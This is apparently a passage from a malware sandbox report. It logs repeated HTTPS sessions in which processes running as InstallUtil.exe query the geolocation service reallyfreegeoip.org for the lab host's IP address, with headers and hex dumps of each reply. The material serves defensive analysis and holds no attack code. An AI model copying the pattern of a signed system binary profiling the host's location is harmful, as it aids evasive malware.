                        2024-09-26 07:58:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:24 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        16192.168.2.549741188.114.96.34433176C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:25 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:25 UTC677INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:25 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2337
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8EH4QxTV6z6RcTC30%2FarxYQgGjG7ApQrVZM0ezLqEDtua55jCLnpWVX1nRjND6BGEYU2b6g1mAs9%2FYOl5Dw2NGQ4vUkhMVH%2FDcWuuyiu2jb9fOUOnZhekNd2m5c7hKJRN%2Fxpdacd"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b56fbb2e4340-EWR
                        2024-09-26 07:58:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:25 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        17192.168.2.549742188.114.96.34435780C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:25 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:25 UTC681INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:25 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2337
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=74iB8wmWIvhtdfoiR7QX%2B3n%2FW2MqIuYKA4XYCKKsxz9YteCUfVfO3%2BO85gLnYf5w5CbLXwZBQl4BEq6v4IaxtNAM4AB2jd%2FhHyD0VAzLKisA19OBEzEuIU9n%2Bq6uQeW8%2FsYokFJu"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b570ee3843b1-EWR
                        2024-09-26 07:58:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:25 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        18192.168.2.549744188.114.96.34435780C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:26 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        2024-09-26 07:58:26 UTC677INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:26 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2338
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dTbRFctE8SDanTc4liwLJqh0SeVGj7eiKsQf7BlT1u4lgI7I0PK6rsta0jom%2B3Dt1xtcX5W%2Br6g0sXsYRpxTnejOb%2Bn2cbojlPN%2BS8fhRUgqlZpPpwp1QSshoG4pY8DaF6yV4dQI"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b575ab21c345-EWR
                        2024-09-26 07:58:26 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:26 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        19192.168.2.549745188.114.96.34433176C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:26 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:26 UTC671INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:26 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2338
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0F1q1V0lW00NBxFIDIdEk4eAYEAhAGhHMPSzKNdzTOvjhAAFIYt63RuoHRG0cGrrdXkcvTYS23nyIYajs96F0PR4TPuJ%2BYEZqOKNuwL3BnryXR0gCz2naOu7iQC6XhhbiLSKqQwU"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5779c650cb5-EWR
                        2024-09-26 07:58:26 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:26 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        20192.168.2.549748188.114.96.34435780C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:27 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:27 UTC673INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:27 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2339
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3tn9VERR8bcP2GNYzsO6ENg9nZMRjK7gLCCrslA2bnlGdNwfcAQ1SVSYEg4gnwRedc4UA%2FUhpjLxFLdqTQ0dhHLtVm5uqwUE8onT8Dkbiksmi8AnyeCiCYfOeN40aLkracPH%2BaVE"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b57f1fe07c8a-EWR
                        2024-09-26 07:58:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:27 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        21192.168.2.549749188.114.96.34433176C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:27 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:27 UTC673INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:27 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2339
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UOP49QQZhHX3VF8tXW6AgyB13Dh9UWBPXitP8eF49ern2XW64%2F%2FS4fKIgAHjADIULq4rV1EJU9g7JM1KOlXJzkdrbP4FoTOFk0vhTuvm6eUivfrx8VT8qiolTYf6gT60ABzC9ETL"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b57f6ad74307-EWR
                        2024-09-26 07:58:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:27 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        22192.168.2.549751188.114.96.34435780C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:30 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:30 UTC675INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:30 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2342
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nq%2F%2FQulPnP934F00oV3FFVJpaLw4naYZZl2fTGkZgD27YnPzUBI9S7oG1%2BgMG37aiTmuNY7sMqV8WZnsfsRNb0taeH9XB8vYuRyJUb5nbqI9IbUCDLO0IfhUFRDXyrcueza00UoB"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b590680ec328-EWR
                        2024-09-26 07:58:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:30 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        23192.168.2.549753188.114.96.34435780C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:33 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:33 UTC675INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:33 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2345
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RJtmcTHvUm4kJilAVv0CZOiNrR1kvBkeM3BRL2sNjLmpHB8F%2FpC%2FgfgFD8wgcuClqSAp2bRVflsX3kuEH98nlmLtxs49CxRk7ogGsQ3od5DtzguGZShmkmAJABh%2BVWdP4MJoKUV1"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5a17c0f425f-EWR
                        2024-09-26 07:58:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:33 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        24192.168.2.549755188.114.96.34435780C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:36 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        2024-09-26 07:58:36 UTC705INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:36 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2348
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5sjFjbadcEn0j9G2%2Bu0GEIyiRR6rX64ThaL82qh3mHJXsH5hmIDhhM%2B9uHHJnEHKchTpzOaA2y7YBEXQiP1hFiwNuoBGcEC9ugbHfF6X5XX%2BbAqtYiYZMk5clh6etVxB2BmBeW57"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5b3fe611891-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-09-26 07:58:36 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:36 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        25192.168.2.549757188.114.96.34435780C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:38 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        2024-09-26 07:58:38 UTC677INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:38 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2350
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HyhNe8%2BABZdkgq2xezl1Qi3OpTsEYWPoHLZcKMYfxd%2BfyadHw5Tsp4nlh7kcVkI9jTVhtJyxbvHzGPg8VUmVjsLI2jefEC1bqJ68OIQ%2BIWg59b%2FagQKQmdZG8oDMCli3AxgOSBxq"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5c52c0b4374-EWR
